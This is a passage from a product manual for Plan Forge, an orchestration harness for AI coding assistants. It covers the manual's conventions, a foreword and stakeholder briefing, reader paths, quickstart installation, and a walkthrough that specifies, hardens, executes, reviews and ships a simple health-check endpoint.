Complete offline edition — 79 chapters & appendices
Read this once, then read anything. Five minutes to learn the visual vocabulary the rest of the manual leans on.
The manual ships as a Quickstart + 5 Parts + 26 Appendices. The chapter numbering scheme tells you which kind of page you're on at a glance.
| Number | Means | Example |
|---|---|---|
Q1 Q2 Q3 | Quickstart steps. The 30-minute zero-to-shipped path. | Q2 · Your First Plan |
1 2 … 24 | Numbered chapters across 5 Parts (Smelt → Forge → Guard → Learn). | Chapter 5 · Crucible |
| (unnumbered) | Sub-chapters and deep dives that hang off a numbered chapter. | Dashboard, LiveGuard |
A B … N | Lettered appendices, reference material, runbooks, enterprise track. | Appendix K · Enterprise Reference Architecture |
O | The Book Index, A–Z search across the whole manual. | Appendix O · Book Index |
This manual describes current behavior. We deliberately avoid NEW vX.Y badges and “introduced in vX.Y” stamps inside reference chapters — they age into anti-signals within a release or two and force every reader to know the version history of every feature.
For version-stamped history, see:
CHANGELOG.md — the canonical, machine-parseable list of what shipped when.Maturity signals (BETA, deprecation warnings, security advisories) are kept inline because they describe a feature's current trust level, not its history.
Each numbered chapter opens with a hero image and may carry inline figures (SVG diagrams or photographs) inside the body. The conventions are deliberately uneven by chapter type:
| Page type | Hero image | Inline figures |
|---|---|---|
| Numbered chapter (1, 2, … 29) | Yes, assets/chapter-heroes/chN-hero.webp, 1024×768, generated. | Yes, numbered Figure N‑K via maintain.mjs. |
| Quickstart step (Q1, Q2, Q3) | Yes, same convention. | Optional. |
| Unnumbered sub-chapter (Dashboard, Settings, MCP Reference, deep dives) | No. Sub-chapters inherit visual weight from their parent. | Yes, un-numbered figures, still wrapped in <figure class="manual-figure">. |
| Reference appendix (Glossary, Quick Reference, Book Index, List of Figures, API Surface Index) | No. Reference pages favor density over decoration. | Rare, only when a diagram clarifies the reference. |
| Narrative appendix (Sample Project, Enterprise, Lessons Learned, History, About the Author) | Yes, same convention as numbered chapters. | Yes. |
maintain.mjs.
Three flavors of inline aside, each colored for instant recognition. They never carry information that isn't also in the surrounding prose, safe to skip on a first pass, useful on a second.
Code, terminal, and config samples come in a labelled block. The header tells you what the snippet is, a terminal command, a config file path, a JSON payload, and there's a Copy button on the right when the snippet is meant to be run as-is.
node docs/manual/maintain.mjs --audit
{
"presets": ["dotnet"],
"execution": { "quorum": "auto" }
}
Inside body prose, monospace means a literal name, a file path, an env var, a tool ID, an argv flag. Italics mean a placeholder you fill in.
Inline SVGs and rasters live under docs/manual/assets/diagrams/. Each one carries an alt attribute that describes the diagram in prose, readers using a screen reader (or readers who'd rather skim) get the full meaning without seeing the picture.
Diagrams come in three sizes (diagram-img-sm, 700 px, -md, 750 px, -lg, 800 px), all centered in the body column. Every diagram is wrapped in a <figure> with a one-line italic caption underneath, derived automatically from the alt text title clause. To override an auto-caption with hand-authored prose, edit the <figcaption> directly and remove the <!--cap:auto--> marker, subsequent maintain.mjs runs will leave it alone.
Some sentences refer to a count that changes between releases, "Plan Forge ships 102 MCP tools", "18 instruction files", "12 agents". Those numbers are tokenized in the page source and rewritten at build time from a single source of truth in docs/manual/assets/manual.js. You'll see the up-to-date number rendered, but if you View Source you'll see the token markers wrapping it.
<!--c:KEY-->NUMBER<!--/c--> instead of typing a literal number in chapter prose. Run node docs/manual/maintain.mjs after editing, it sweeps every chapter, fixes drift, and warns on unknown keys.
| Where | What it gives you |
|---|---|
| Left sidebar | Always-visible chapter list grouped by Part. Collapses on narrow screens to a hamburger. |
| Sidebar search | Type to filter chapters and indexed sections. Matches both titles and the curated section index. |
| Prev / Next links | At the bottom of every chapter, in reading order. Skips deep-dive sub-chapters unless you're inside one. |
| Back-to-top button | Appears on long pages once you scroll past the first screen. |
| Appendix O — Book Index | A–Z list of every concept, tool, and named section. Letter jump-bar at the top. |
| Appendix P — List of Figures | Every numbered figure in the manual, in chapter order. Click to jump to the diagram in context. |
| Appendix A — Glossary | Definitions of every Plan Forge term. Read first if a chapter uses words you don't recognize. |
The cover offers four "where to next?" tiles, new to Plan Forge, on the GitHub stack, extending it, on a different stack. Pick the path that matches what you're doing today and the manual stays roughly half its apparent size.
Every page footer (and the meta-bar at the top of the cover) shows the manual edition, pinned to the Plan Forge version it was published with. The full release history lives in CHANGELOG.md on GitHub.
pforge brain {status, hint, test, replay} subcommands; Team Dashboard tab added to the Forge group (now 19 tabs). Project History extended through v3.6 with v2.95 Lattice, v3.0 Copilot trilogy, v3.2–3.4 Team Mode. Refreshed counts (102 MCP tools, 97 CLI commands).Spotted something that's wrong, stale, or missing? File an issue on github.com/srnichols/plan-forge with the chapter title and section heading. Manual fixes are tagged docs: in the changelog.
A year. From "getting enterprise-grade code out of an AI agent is nearly impossible" to a four-station forge shop that produces a 99/100 application in seven minutes. Same model. Same machine. No manual intervention. This Foreword frames what changed, what did not, and what the rest of the book teaches.
Plan Forge began in spring 2025 as a single 2,000-line copilot-instructions.md file written out of frustration with AI agents that could generate code faster than any human team but produced output without interfaces, without DTOs, without tests beyond the happy path, and without any concept of architectural discipline. Over the year that followed, the single file fractured into eighteen focused instruction files, then a six-step pipeline, then a four-session execution model, then a multi-model quorum, then an MCP server with a CLI and a dashboard, then a four-station shop, Smelt, Forge, Guard, Learn, with persistent memory, post-deploy defense, and a self-tempering audit loop. The model never got the credit. The variable was always context.
"The quality of AI-generated code is not a function of model capability, it's a function of the context you provide."
— From Impossible to 7 Minutes, May 2026
Run the same model against the same requirements on the same machine, twice. Once without guardrails. Once inside Plan Forge. The numbers come from a controlled A/B test documented in detail in Chapter 1:
The model was the same in both runs. So was the prompt, the hardware, the afternoon. What changed was the shop around the model. Scope contracts told it what to touch. Validation gates told it when a slice was done. The Plan Hardener turned a paragraph of feature description into an execution contract with explicit forbidden actions. The four-session architecture made sure the agent that built the code never reviewed its own work. The numbers are not a model story, they are an SDLC story.
What started as one file is now a workshop. Every phase of the software lifecycle has a station; every station is AI-run and product-owner-supervised; every station passes its work to the next through a contract the next station can verify.
| Station | Phase of the lifecycle | What it produces |
|---|---|---|
| 🪨 Smelt | Intake → scope contract | A hardened plan the Forge can execute without follow-up questions, scope boundaries, validation gates, forbidden actions, rollback steps |
| 🔨 Forge | Scope contract → shipped code | Green tests, green CI, green cost ledger, or an honest stop with a fix proposal at the slice that failed |
| 🛡️ Guard | Post-deploy defense (LiveGuard) | Pre-deploy block on severity ≥ high, post-slice drift advisory, triaged incidents with proposed fixes |
| 🧠 Learn | Memory & retrospectives | Tomorrow's plan is colder, faster, and less wrong than today's. Decisions persist across sessions in OpenBrain. |
The same lesson runs through all four. The model is not the bottleneck; context is. The shop is just more places to put context.
This book is the practical companion to that shop. It is three things at once, deliberately:
It is not a marketing brochure. The numbers in this book come from the same source files the system is built from, tool counts from capabilities.mjs, CLI flags from pforge.ps1, event names from EVENTS.md, cost figures from the same cost-service.mjs the orchestrator uses. When a number drifts in the code, the book breaks the build until the number is fixed.
It is not a tutorial that ends at "hello world." Every Part lands a reader at a different operational depth: Quickstart ships your first plan in thirty minutes; Part II carries you through autonomous orchestration; Part III through post-deploy defense; Part IV through institutional memory; Part V through team-scale coordination.
It is not a product spec. The shop changes. The principles do not. When the book describes why the four-session architecture exists, that section will still be true two model generations from now, even if the model names in the example commands change.
It is also not a process you rent from us, Plan Forge is MIT-licensed because no two shops' SDLC is the same, and your institutional memory lives in OpenBrain, a service you run, not in any vendor's cloud. The two most strategic assets a software organization accumulates, its process for shipping software, and the memory of why every past decision went the way it did, stay in your hands. The harness is yours to fork and tweak; the brain is yours to host. The book documents both because the architecture only makes sense once both are explicit.
The book is designed so a reader who has never installed Plan Forge can land on a working pipeline in thirty minutes, and a reader who has been running it for six months can find the one paragraph that explains a behavior they just saw in production. Both readers start in different places.
| If the reader is… | Start here | Then read |
|---|---|---|
| First-contact, never run Plan Forge | Quickstart Q1 — Install | Q2 (first plan), Q3 (review & ship), then Chapter 1 for the mental model |
| Frame-setting, wants the mental model first | Chapter 1 — What Is Plan Forge? | Chapter 2 for the pipeline, then back to the Quickstart for hands-on |
| Operator, already shipping with it | Chapter 15 — Troubleshooting or the CLI Reference | Targeted dives by symptom or by tool name |
| Reviewer / architect, evaluating for adoption | Appendix H — GitHub Stack Alignment | Appendix I for the substrate map, then Chapter 1 for the four-station overview |
| Curious, wants the story | This Foreword | The blog posts cited above, then Project History for the version-by-version evolution |
A dedicated Reader-Journey Ladders page sits next to this Foreword in Front Matter and unfolds those paths into per-persona deep-dive sequences, solo developer, team lead, reviewer or architect, enterprise architect, extension author, each ending at a concrete ship-it moment. When the reader knows which persona they are, the Ladders are the next stop.
For the reader who needs to walk a colleague, a manager, or a VP through the adoption decision in a single sitting, the Stakeholder Briefing, also in Front Matter, is the 10–15 minute white-paper version: eight sections, bold lead sentences, all the canonical numbers, the same source-of-truth as the rest of the book, and a closing tailoring flow with a template and a slash-command skill for remixing the briefing for the reader's own organization.
For the reader who prefers to start from worked examples rather than from architecture, Appendix R — A Day in the Forge collects three short case studies absorbed from contemporary blog posts: the closed-loop audit of a production Next.js site, the .NET 99-vs-44 A/B test against vibe coding, and the three-model quorum run that paid $0.22 for measurably better software. Each vignette ends with a cross-link into the canonical chapter that owns the topic.
For the reader who needs to answer the question a manager or VP will eventually ask — “how much will this cost us?” — Chapter 31 — Cost & Economics is the single-chapter answer: the four levers that determine total cost, the compounding flywheel that bends the cost curve downward over a project's lifetime, and the quorum-mode trade-offs a team lead needs to set a realistic budget.
The body of this manual is written in third person, present tense, the voice of a reference. That is deliberate: a reference outlives the version that produced it, and the third-person voice carries forward without re-editing when the maintainer changes, the contributor base grows, or the project's center of gravity moves outside any one author. Direct first-person material from the project's blog posts appears in blockquote form, attributed, so the reader can see where the editorial voice ends and the contemporary record begins.
This Foreword and the Reader Paths page break that rule once, narrowly, by leaning on the journey itself. Every other chapter speaks in the reference voice.
"The forge is lit. The metal is hot. Build something that lasts."
— From Impossible to 7 Minutes, May 2026
The rest of the book is the map for doing exactly that.
A skimmable, self-contained, eight-section white paper sized for the longest read a busy manager or VP gives you in one sitting. Designed to be shared as one link, read end-to-end without leaving the page, and remixed into a per-organization briefing using the three-path ladder in Section 8.
Who this is for. The internal champion who has already decided Plan Forge deserves serious evaluation and now needs to walk a colleague, a manager, or a VP through the decision. What this is not. A marketing landing page (those live at planforge.software) and not a replacement for a per-prospect briefing (those still need writing, this just hands you the ~50% that is canonical so you can spend your time on the ~50% that is yours).
How to read it. ≈10–15 minutes end-to-end. Each section opens with a bolded lead sentence, then bullets, then a "Read more →" link into the canonical chapter for the reader who wants to drill in. Every headline number is sourced from the same place as the rest of the book (see the Project History for the version stamps); the briefing and the manual cannot drift.
AI coding tools get a feature from prompt to running code in minutes: and then leave the rest of the SDLC to humans. Plan Forge is the orchestration harness that closes that gap. It sits on top of GitHub Copilot (and any other AI coding tool that speaks the Model Context Protocol) and adds the four layers production software actually needs: planning, validation gates, memory, and reviewer separation. The receipt on the project's own seven-slice memory-QA plan is $0.07 on a single mid-tier model in roughly 51 minutes, zero failed slices, zero escalation. The system QA'd itself with the very upgrades it was QA'ing, for the price of a coffee.
Read more → Foreword — From Impossible to Seven Minutes (10 min, the year-long story behind the receipt).
Plan Forge is the orchestration harness that sits on top of GitHub Copilot (and other AI coding tools). It does not replace your model or your IDE, it adds the SDLC layer GitHub deliberately leaves to the ecosystem: planning, validation gates, memory, cost control, and reviewer separation. It is also licensed MIT because your SDLC is yours, and your institutional memory lives in OpenBrain, a user-owned service, because your accumulated decisions should not be trapped inside any one AI vendor.
The two-axis claim, harness on substrate and your-SDLC-is-yours, matters in equal measure. The first one explains why Plan Forge does not compete with GitHub Copilot, Claude Code, Cursor, Codex, Gemini CLI, or Windsurf; it routes work through them. The second explains why nothing in the harness is rented, gated, or trapped behind a control plane the user does not own. The condensed positioning table:
| Plan Forge is | Plan Forge is not |
|---|---|
| The orchestration harness on top of GitHub Copilot and other AI coding tools. | An AI model. Plan Forge works with whatever AI is already in the IDE. |
| The SDLC layer (planning, validation, memory, cost, reviewer separation) GitHub deliberately leaves to the ecosystem. | A code generator. Plan Forge does not write the code, it tells the model how to, then verifies the result. |
| Opinionated about software shape, interfaces, DTOs, typed exceptions, tests. | Opinionated about the stack. Nine presets cover .NET, TypeScript, Python, Java, Go, Swift, Rust, PHP, and Azure IaC. |
| MIT-licensed because your SDLC is yours. | A managed cloud service or a process you rent. Plan Forge runs entirely inside your existing IDE, CLI, and repo. |
| Tied to your repo's source of truth via GitHub Issues, PRs, and Actions. | A CI/CD system. It does not deploy your app; it validates that what was built matches what was planned. |
| Designed so institutional memory lives in OpenBrain, a user-owned service. | A project manager. It does not assign work to humans or track sprints; it structures work for AI agents. |
Read more → Chapter 1 — What Is Plan Forge? (full IS / IS NOT table plus the four-station overview).
Plan Forge is cheap to run because four mechanical levers compound, not because the model rate is low. Each lever is independently measurable and independently dial-able. A team that turns all four on can run a hardened plan end-to-end for cents; a team that turns them off pays whatever the model bills. The levers, in order of typical impact:
| Lever | What it does | Typical impact |
|---|---|---|
| 1. Auto-escalation | Runs every slice on the cheapest model that can pass the gate. Escalates to a stronger model only when the cheaper one fails. | Plans that used to default to a flagship model now run start-to-finish on a mid-tier model. The Phase-MEMORY-QA plan: 7 slices, $0.07 total, no escalation. |
| 2. Validation gates | Every slice ends in a concrete shell command (tests, lint, type-check). The next slice does not start until the gate is green. | The cost of finding a regression collapses to one slice's spend instead of a whole plan's. Drift dropped 64% over 90 days on the project's own memory-QA stream. |
| 3. Scope contract | The plan lists exactly which files are in-scope, out-of-scope, and forbidden. The orchestrator blocks edits outside scope. | The model spends its tokens on the work, not on speculative side-quests. Quorum mode adds about $0.22 of overhead on a representative C# invoicing slice and produces +20% tests with reusable helpers (see the A/B run in Chapter 7). |
| 4. Memory layer | Past decisions, past gates, past fixes are recalled into the next plan's context via OpenBrain instead of being re-derived from scratch. | Tomorrow's plan starts where yesterday's left off. The compounding flywheel: each plan runs colder, faster, and less wrong than the last. |
Read more → Advanced Execution — Cost Optimization (the canonical lever table, the full math, the quorum-mode A/B run) and Dashboard — Cost Tab (the cost-ledger walk-through).
A vibe-coding pipeline runs the same plan tomorrow at the same cost it ran today. A Plan-Forge pipeline runs tomorrow's plan a bit colder, the gates that were tight yesterday are still tight, the patterns that worked are recalled, the patterns that failed are flagged in the lattice before the model touches the file. After ninety days, the same plan that cost a dollar on day one costs a fraction of that on day ninety, with fewer escalations, fewer failed slices, and fewer reviewer-found defects. That curve is what compounds.
Three concrete mechanisms make the curve real, not aspirational:
Read more → Memory System chapter (architecture, the Phase-MEMORY-QA receipt, and the four pieces, Hallmark, Anvil, Lattice, sync_memories, that make the recall layer concrete).
The brief above covers the things teams come to Plan Forge for. A handful of capabilities ship in the same box without being part of the headline pitch, they exist because they kept being the missing piece in production AI-SDLC adoptions and adding them once was cheaper than re-explaining their absence to every new team. None of them is hidden, gated, or paywalled; they ship in the same MIT-licensed harness as everything else.
Read more → Chapter 1 — The Virtual Engineering Team (role map + your three jobs), Forge-Master chapter (agents supervising agents), and Appendix J — Plan Forge for Enterprise (multi-tenancy, data residency, compliance posture).
There are two ways to adopt Plan Forge, and they are both first-class. Neither one is a downgrade of the other; the right route depends on whether your organization needs the harness to look like your shop or the community's shop. Both routes terminate at the same place: a hardened, gated, memory-backed pipeline running against your repo with audit trail on every artifact.
setup.ps1 (or setup.sh) against the preset that matches your stack, and start running pforge run-plan against your plans within the hour. Stay on the community upgrade cadence; PRs flow upstream when something is generally useful, locally when something is yours alone. Best for teams that want to skip the build phase and adopt a working pipeline today.Read more → Installation chapter (route A, step-by-step) and Customization chapter (route B, the customization spine).
An SDLC harness is the wrong layer to rent. Renting the model is fine, the model is interchangeable, replaceable, and improves on a vendor's roadmap that is not your problem to manage. Renting the orchestration on top of the model is a category mistake. The orchestration is where your decisions live, where your audit trail accumulates, where your compliance posture is encoded, and where your institutional memory is stored. The closer that layer sits to your business, the worse the lock-in if you do not own it.
Four things change when the harness is open source and the memory layer is user-owned:
Read more → Memory System chapter (the user-owned memory layer) and Customization chapter (the customization spine).
The eight sections above are the ~50% of any per-organization briefing that is canonical. The other ~50% (the parts that name your squads, your KPIs, your pilot timeline, your ask) cannot and should not be pre-written. They are the parts the internal champion has to author or commission. The tailoring flow is the path from this generic briefing to that per-organization briefing, without anyone needing to open an issue and wait for a maintainer to respond. Three paths, in increasing order of Plan Forge involvement:
| Path | Effort | What you do | Best for… |
|---|---|---|---|
| 1. Template | ~5 minutes | Copy the stakeholder-briefing template from GitHub. Fill the five placeholders (<<COMPANY>>, <<SQUADS>>, <<KPIS>>, <<PILOT_TIMELINE>>, <<THE_ASK>>). Publish where your org publishes briefings. |
The internal champion who already knows the answers and just wants a structured document. |
| 2. Skill | ~15 minutes | Invoke /stakeholder-briefing in your AI coding tool (the skill ships with Plan Forge). The skill prompts for the five placeholders, optionally takes a --source-dir pointing at your existing strategy materials, and uses forge_search to pull relevant context into the prospect-specific sections. Output is a filled briefing as markdown or HTML. |
The internal champion who wants Plan Forge to draft the prospect-specific 50% from existing materials. |
| 3. Community | days, async | Open a discussion in the Plan Forge repo with your draft. A maintainer or community reviewer critiques structure, sharpens claims, and flags overreach. No SLA, this is the open-source long tail. | The champion who has a draft and wants a second pair of eyes before sending it to a VP. |
The closing thought is deliberately recursive: the briefing about Plan Forge ends by inviting the reader to use Plan Forge to remix the briefing. That is the demo. A tool whose closing CTA is "open an issue and wait" is selling something other than what its first seven sections claimed. A tool whose closing CTA is "here is the template, here is the skill, here is the community, pick the one that matches your effort budget" has the same shape inside and outside.
A blacksmith doesn't hand raw iron to a customer. They smelt it, hammer it, temper it, and then they watch, because a blade that isn't maintained will dull.
The briefing above is the case made in ten minutes. The book is the case made in detail, station by station, decision by decision, with the receipts. The Foreword opens the door; the Reader-Journey Ladders pick the path; the chapters do the work. Start anywhere, the harness is yours either way.
The Foreword offered a five-row teaser table for the impatient. This page is the longer version. Five persona ladders, each an ordered sequence of chapters and appendices, each with a ship-it moment so you know when you have actually arrived somewhere instead of just reading.
Pick the ladder that matches the work in front of you. Two ladders may apply, that is fine, climb the one whose ship-it moment is closer to today's problem. The book is designed so any ladder lands you on a useful artifact within a sitting or two of reading.
| If you are… | The ladder is for you when… | First rung |
|---|---|---|
| Solo developer | You ship code alone (a side project, a one-person service, an MVP). You want guardrails without the team-coordination overhead. | Q1 — Install |
| Team lead | You run a 2–5 person engineering team. You need to onboard developers onto a shared pipeline and explain the choice upward. | Chapter 1 — What Is Plan Forge? |
| Reviewer or architect | You are evaluating Plan Forge for adoption. You need the substrate map, the cost calculus, and the lock-in story before you can recommend or reject. | Appendix H — GitHub Stack Alignment |
| Enterprise architect | You ship across multiple teams under compliance and audit requirements. You need multi-tenancy, data residency, and an operational playbook before pilot. | Appendix J — Plan Forge for Enterprise |
| Extension author | You want to extend Plan Forge, a new tool, a new agent, a new skill, a new notifier. You need the MCP surface and the customization spine. | Chapter 1 — What Is Plan Forge? |
None of these fits? Read the Foreword, then the first chapter, then follow your curiosity. The sidebar is your friend; the Index and site search handle the rest.
You are here if you are the only one shipping code on your project. You want Plan Forge's structural quality benefits (interfaces, DTOs, typed exceptions, tests, see the 99-vs-44 evidence in Chapter 1) without the team-coordination machinery. The Quickstart trilogy gets you from zero to a shipped feature in thirty minutes; the rest of the ladder turns that one-shot into a habit.
pforge smith.pforge CLI is the surface you will live in.docs/plans/, run it autonomously via pforge run-plan, watch the slices land green, and ship the feature, all without leaving the terminal or asking another human to review the AI's work.
Skip for now (come back later if you grow): team coordination, multi-agent setup, enterprise reference architecture. They will be waiting when you need them.
You are here if you run a small engineering team and you are deciding whether to bring Plan Forge in. Two problems sit on top of you: convincing the team (and whoever signs off), and operating the pipeline once it is running. The ladder covers both, in that order.
You are here if you have been asked to evaluate Plan Forge. The decision is whether your organization should adopt it, and if so, how. Three things matter to you: where it sits relative to what you already run (GitHub, Copilot, your CI), what it costs and what it locks you into, and whether the architecture survives the questions a senior engineer will ask after twenty minutes of reading.
You are here if you are taking Plan Forge into an environment with compliance requirements, multi-team isolation, audit trails, and a procurement process. The reviewer ladder above answered “should we adopt?” This ladder answers “how do we deploy it safely across the organization?”
You are here if you want to extend Plan Forge, add a tool, a skill, an agent, a notifier, or a custom workflow. The ladder starts with the mental model, walks through the customisation spine, and lands on the MCP surface and the extension catalog.
Some readers will fit two ladders, a team lead who is also evaluating adoption, an enterprise architect who wants to author an internal extension, a solo developer who later inherits a team. The ladders are not exclusive. The recommended hops:
| You started as… | You also need… | Hop directly to… |
|---|---|---|
| Solo developer | To onboard a second developer | Team-lead ladder, rung 4 (Chapter 6 & 7), then rung 6 (Multi-Agent) |
| Team lead | To pitch upward | Reviewer/architect ladder, rungs 1–3 (Apps H, I + Chapter 1) |
| Reviewer or architect | To recommend a deployment topology | Enterprise ladder, rungs 1–2 (Apps J & K) |
| Enterprise architect | To customise the fleet | Extension-author ladder, rung 5 (Customization) |
| Extension author | To publish to the catalog | Chapter 12 + the PUBLISHING.md guide on GitHub |
This page, like the Foreword, addresses the reader in second person (“you are here if…”) rather than the third-person reference voice used in the rest of the manual. That is the narrow exception called out in the Foreword's note on voice: the Foreword and the Reader Paths page lean on the reader's journey because their job is the journey. Every other chapter speaks in the reference voice.
The book is the map; the ladder is the route. Start at rung one of your ladder. The ship-it moment marks the top, and from there you can either start a new ladder or follow your own curiosity through the rest of the manual.
Zero to pforge smith green in 10 minutes.
This is the fast path. For full options (polyglot presets, multi-agent adapters, updating) see Chapter 3: Installation.
What you need depends on how you'll drive Plan Forge. Three of the four prerequisites are universal; Node.js is only needed when you want the dashboard, MCP server, or REST API.
| Tool | Minimum | Check | Required for |
|---|---|---|---|
| Git | 2.30+ | git --version | Everyone, required by setup, all CLI commands, and version-aware features. |
| VS Code (or Insiders) | 1.99+ | code --version | UI path, prompts, agents, skills, and the Copilot integration all live inside VS Code. |
| GitHub Copilot extension | Active subscription | Copilot icon in status bar | UI path, powers the chat prompts and the hardening pipeline. |
| Node.js | 18+ | node --version | CLI / server path, needed for the dashboard, the MCP server, pforge.ps1 / pforge.sh, and the 102 tools. Skip if you'll only use prompts + instructions + agents inside Copilot Chat. |
| OpenBrain (optional, recommended) | Latest | pforge brain hint | L3 semantic memory (PostgreSQL + pgvector). Unlocks Reflexion lessons, Auto-skills, cross-project Federation, and 28 auto-capturing tools. Use the Plan-Forge-tuned fork at srnichols.github.io/OpenBrain; the upstream OpenBrain has been modified to align with Plan Forge's hub schema and Hallmark provenance. See Chapter 21: Memory Architecture for how it wires into .forge.json, the dashboard, and the three-tier model. |
setup.ps1 / setup.sh wizard runs in either path. If Node.js isn't installed, it skips the MCP server scaffold and still wires up the prompts, instructions, agents, and skills inside .github/.
One command gets you from zero to a fully configured forge:
git clone https://github.com/srnichols/plan-forge.git my-forge
cd my-forge
.\setup.ps1 -Preset <your-stack>
git clone https://github.com/srnichols/plan-forge.git my-forge
cd my-forge
chmod +x setup.sh && ./setup.sh --preset <your-stack>
.\setup.ps1 -ProjectPath ../my-app -Preset typescript
Replace <your-stack> with one of these nine presets:
pforge smithRun the Smith diagnostic to confirm everything is green:
.\pforge.ps1 smith
Environment:
✓ git 2.44.0
✓ code 1.99.0
✓ PowerShell 7.5.0
✓ node 22.3.0
Setup Health:
✓ .forge.json valid
✓ 21 instruction files
✓ 19 agent definitions
Results: 10 passed | 0 failed | 0 warnings
FIX: suggestion inline. Most common: add "chat.agent.enabled": true to .vscode/settings.json. See Troubleshooting for more.
Specify, harden, and execute a feature in 15 minutes.
This is the essential path through Steps 0–3. For the full walkthrough (sweep, review, ship, and everything in between) see Chapter 6: Your First Plan.
pforge smith should show all green. Have VS Code open with GitHub Copilot active.
A GET /health endpoint, deliberately simple so you can focus on the pipeline, not the code. You'll run three steps: specify → harden → execute. The endpoint takes about 15 minutes to build; the pipeline knowledge you gain applies to every feature after this.
Ctrl+Shift+I (Windows) · Cmd+Shift+I (Mac).github/prompts/step0-specify-feature.prompt.md<FEATURE-NAME> with health-endpoint and sendThe specifier agent interviews you. Here are the answers for a health endpoint:
Problem: Load balancers need to verify the service is running.
Scenarios: GET /health every 30s → 200 OK {"status":"healthy"}.
Criteria: Returns 200 with JSON. Under 50ms. No auth required.
Edge cases: DB unreachable → 503 {"status":"degraded","reason":"database"}.
Out of scope: No deep checks (Redis, APIs). No metrics endpoint.
The agent creates docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md.
Still in the same session, attach .github/prompts/step1-preflight-check.prompt.md, replace <YOUR-PLAN> with Phase-1-HEALTH-ENDPOINT-PLAN, and send. The agent verifies git state, guardrail files, and the roadmap. For a fresh install, everything passes.
Attach .github/prompts/step2-harden-plan.prompt.md, replace <YOUR-PLAN>, and send. The hardener adds the mandatory blocks to your plan file:
## Scope Contract ← Files the AI may touch
## MUST Criteria ← Non-negotiable requirements
## Execution Slices ← 30–120 min checkpointed chunks
### Slice N
Tasks: …
Gate: dotnet build && dotnet test ← Must pass before next slice
Stop if: Gate fails
## Rollback Plan ← How to undo safely
When the agent says "Plan hardened", Session 1 is complete.
Three ways to run execution, choose one:
pforge run-plan docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md
Kick off and walk away. Watch at localhost:3100/dashboard.
pforge run-plan --assisted docs/plans/Phase-1-HEALTH-ENDPOINT-PLAN.md
You code; orchestrator validates gates automatically.
Start a new Copilot session. Attach step3-execute-slice.prompt.md. The AI reads the plan and executes slice by slice.
The executor builds the endpoint, runs build, runs test, and reports pass/fail at each gate. If a gate fails, execution stops, no silent failures.
You've completed Sessions 1 and 2 of the 4-session pipeline:
Session 1 (Specify & Plan) ✓ Described what you wanted; AI structured it
Session 2 (Execute) ✓ AI built it slice-by-slice with validation gates
Session 3 (Review) … Next step →
Session 4 (Ship) … Final step →
Sweep, review, and ship in 10 minutes.
This covers Steps 4–6: the completeness sweep, independent review, and shipping. For deeper explanations of each step see Chapter 6: Your First Plan.
The completeness sweep scans every code file for markers that indicate unfinished work: TODO, FIXME, HACK, stub, placeholder, mock data. For a health endpoint this should return zero.
pforge sweep
If the sweep finds any markers, resolve them before continuing. Deferred-work markers are how technical debt silently accumulates, this is where you catch them before they ship.
Critical: start a brand-new chat session by clicking the + button. The reviewer must not carry context from the builder, context contamination is the most common source of missed errors.
.github/prompts/step5-review-gate.prompt.md<YOUR-HARDENED-PLAN> with Phase-1-HEALTH-ENDPOINT-PLAN and sendThe review agent checks every change against the Scope Contract: forbidden files not touched, no architecture violations, test coverage meets MUST criteria, no scope creep. For a simple health endpoint, expect a clean PASS.
One final session (new or continued if context allows) to commit and close out the feature:
.github/prompts/step6-ship.prompt.mdfeat(health): add GET /health endpointdocs/plans/DEPLOYMENT-ROADMAP.md to mark the phase complete# Stage everything and commit
git add -A
git commit -m "feat(health): add GET /health endpoint"
git push origin main
You've completed all 4 sessions of the Plan Forge pipeline:
Session 1 (Specify & Plan) ✓ Described the feature; AI structured the plan
Session 2 (Execute) ✓ AI built it slice-by-slice with gates
Session 3 (Review) ✓ Fresh AI session audited for drift and errors
Session 4 (Ship) ✓ Committed, roadmap updated, postmortem captured
The four-session model is deliberate. Each session has a single responsibility and fresh context, the reviewer couldn't carry bias from the builder even if it wanted to. This is what makes the pipeline scale from a health endpoint to a 40-slice refactor.
You've run the full pipeline end-to-end. The same process works for any feature, the pipeline scales with the work:
Deep dive on scope contracts, slices, validation gates, and stop conditions.
Live slice view, cost tracking, traces, and replay — your command desk.
Project Principles, profiles, and forge.json — make Plan Forge yours.
The Forge Shop, four stations, and why this architecture works.
Three worked case studies — the closed loop, the 99-vs-44 A/B test, the quorum run — for context on what just happened.
The AI-Native SDLC Forge Shop. One workshop, four stations, every phase of the lifecycle.
Plan Forge is the orchestration harness that sits on top of GitHub Copilot (and other AI coding tools). It does not replace your model or your IDE, it adds the SDLC layer GitHub deliberately leaves to the ecosystem: planning, validation gates, memory, cost control, and reviewer separation.
It is also licensed MIT because your SDLC is yours, and your institutional memory lives in OpenBrain, a user-owned service, because your accumulated decisions should not be trapped inside any one AI vendor.
Plan Forge is a complete AI-native SDLC workshop. Instead of giving your AI agent a single code-generation step, it gives the agent a whole shop, four specialized stations (Smelt, Forge, Guard, Learn) connected by gates, telemetry, and persistent memory.
"A blacksmith without a shop is just a hammer in a hand."
docs/plans/ describing one feature: what to build, what files it can touch, what tests must pass.dotnet test) that must pass before the next slice runs. Gates are how Plan Forge knows the AI didn't break anything.All five terms have full entries in the Glossary.
Every station handles one phase of the software lifecycle. Every station is AI-run and product-owner-supervised — you own spec, direction, and final acceptance; the shop owns build, review, supervision, defense, and learning. See The Virtual Engineering Team below for the role-by-role map.
| Station | Phase | What runs here | What comes out |
|---|---|---|---|
| 🪨 Smelt | Intake → scope contract | Specifier agent, hardening runbook, /specify, /harden-plan, Project Principles |
A Scope Contract the Forge can execute without follow-up questions |
| 🔨 Forge | Scope contract → shipped code | pforge run-plan, slice gates, quorum mode, auto-escalation, cost ledger |
Green tests, green CI, green cost ledger, or an honest stop with a fix proposal |
| 🛡️ Guard | Post-deploy defense (LiveGuard) | Secret scan, env drift, regression guard, incident triage, fix proposals | Pre-deploy block on severity ≥ high, post-slice drift advisory, triaged incidents |
| 🧠 Learn | Memory & retrospectives | OpenBrain, bug registry, testbed findings, Health DNA, Forge Intelligence | Tomorrow's plan is colder, faster, and less wrong |
Plan Forge isn't "AI plus a code-completion plugin." It's a full enterprise engineering shop where every traditional role is filled by a specialized agent or guardrail, governed by 40 years of software engineering practice encoded into 17+ auto-loading instruction files and 20 specialized reviewers.
| Traditional engineering role | Plan Forge equivalent |
|---|---|
| Product Owner (spec, direction, acceptance) | You — non-negotiable, non-replaceable |
